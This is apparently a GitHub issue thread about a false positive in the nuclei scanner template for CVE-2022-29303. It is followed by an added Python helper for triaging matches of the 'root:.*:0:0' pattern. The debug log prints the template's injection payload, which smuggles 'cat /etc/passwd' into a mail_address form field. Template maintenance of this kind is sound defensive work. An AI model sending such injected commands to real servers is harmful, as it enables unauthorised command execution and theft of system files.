Closed 0xPugal closed 10 months ago
Hi @0xPugazh, I'm unable to replicate this issue.
```
geekfreak@localhost ~ % nuclei -u https://abc.com -id CVE-2022-29303 -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.0.3

        projectdiscovery.io

[INF] Current nuclei version: v3.0.3 (latest)
[INF] Current nuclei-templates version: v9.6.9 (latest)
[INF] New templates added in latest release: 73
[INF] Templates loaded for current scan: 1
[WRN] Executing 1 unsigned templates. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2022-29303] Dumped HTTP request for https://abc.com/conf_mail.php

POST /conf_mail.php HTTP/1.1
Host: abc.com
User-Agent: Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

mail_address=%3Bcat${IFS}/etc/passwd%3B&button=%83%81%81%5B%83%8B%91%97%90M
[DBG] [CVE-2022-29303] Dumped HTTP response https://abc.com/conf_mail.php

HTTP/1.1 403 Forbidden
Connection: close
Content-Length: 1053
Content-Type: text/html
Date: Tue, 14 Nov 2023 05:56:23 GMT
Server: CloudFront
Via: 1.1 efe084c020e92c5aaed2cec86751428c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: KcPt12Vy9N1NqBgh8j7faDQAVjrWG1UVXr7JTpsJU90dsh3l6OcAKQ==
X-Amz-Cf-Pop: BOM54-P2
X-Cache: Error from cloudfront

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<TITLE>ERROR: The request could not be satisfied</TITLE>
</HEAD><BODY>
<H1>403 ERROR</H1>
<H2>The request could not be satisfied.</H2>
<HR noshade size="1px">
This distribution is not configured to allow the HTTP request method that was used for this request. The distribution supports only cachable requests.
We can't connect to the server for this app or website at this time. There might be too much traffic or a configuration error. Try again later, or contact the app or website owner.
<BR clear="all">
If you provide content to customers through CloudFront, you can find steps to troubleshoot and help prevent this error by reviewing the CloudFront documentation.
<BR clear="all">
<HR noshade size="1px">
<PRE>
Generated by cloudfront (CloudFront)
Request ID: KcPt12Vy9N1NqBgh8j7faDQAVjrWG1UVXr7JTpsJU90dsh3l6OcAKQ==
</PRE>
<ADDRESS>
</ADDRESS>
</BODY></HTML>
```
Hey @DhiyaneshGeek, I just use abc.com as a target example.
Hi @0xPugazh, I have DMed you on Discord and Twitter about this issue.
Looking forward to hearing back from you.
Thanks!
Hi @0xPugazh, I have fixed the issue and raised PR #8676. Let me know if it looks good.
Thanks
Hey, CVE-2022-29303 in Nuclei often shows a critical vulnerability. This looks like a false positive. The matcher has `- "root:.*:0:0"`, but it doesn't return the content of `/etc/passwd`; instead it shows some code in a JavaScript file.
Nuclei Version: v3.0.3 (latest)
Template file: http/cves/2022/CVE-2022-29303.yaml
Command to reproduce:
Anything else:
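
The false positive reported above, as an added example that is not part of the original thread and is not the change made in PR #8676: a triage helper that applies the loose matcher quoted in the issue and then three extra checks before a finding is escalated. The stricter pattern, the content-type list, the function name and the sample bodies are assumptions constructed for this example.

```python
import re

# Matcher quoted in the issue: any line with "root:" followed later by ":0:0".
LOOSE = re.compile(r"root:.*:0:0")
# Assumed stricter pattern: a full passwd entry for root, i.e.
# name:password:0:0:gecos:/home:/shell with absolute home and shell paths.
STRICT = re.compile(r"\broot:[^:\s]*:0:0:[^:\n]*:/[^:\s]*:/[^:\s<]+")
# Assumed list of content types in which a hit is script or data, not a file dump.
SCRIPT_TYPES = ("javascript", "ecmascript", "json", "css")


def triage(status, content_type, body):
    """Classify a response that a scanner flagged with the loose matcher."""
    if not LOOSE.search(body):
        return "no-match"
    if status != 200:
        return "false-positive: status %d" % status
    if any(t in content_type.lower() for t in SCRIPT_TYPES):
        return "false-positive: matched inside %s" % content_type
    if not STRICT.search(body):
        return "false-positive: no complete passwd entry"
    return "needs-manual-verification"


# Constructed sample responses (not taken from any real target).
JS_BODY = 'var o={root:document.body,pad:"0:0:0"};'
HTML_WITH_INLINE_JS = "<html><script>" + JS_BODY + "</script></html>"
PASSWD_BODY = "<pre>root:x:0:0:root:/root:/bin/bash\nbin:x:1:1::/bin:/bin/false</pre>"
CLOUDFRONT_403 = "<H1>403 ERROR</H1><H2>The request could not be satisfied.</H2>"

SAMPLES = [
    (200, "application/javascript", JS_BODY),
    (200, "text/html", HTML_WITH_INLINE_JS),
    (200, "text/html", PASSWD_BODY),
    (403, "text/html", CLOUDFRONT_403),
]

if __name__ == "__main__":
    for status, ctype, body in SAMPLES:
        print(status, ctype, "->", triage(status, ctype, body))
```
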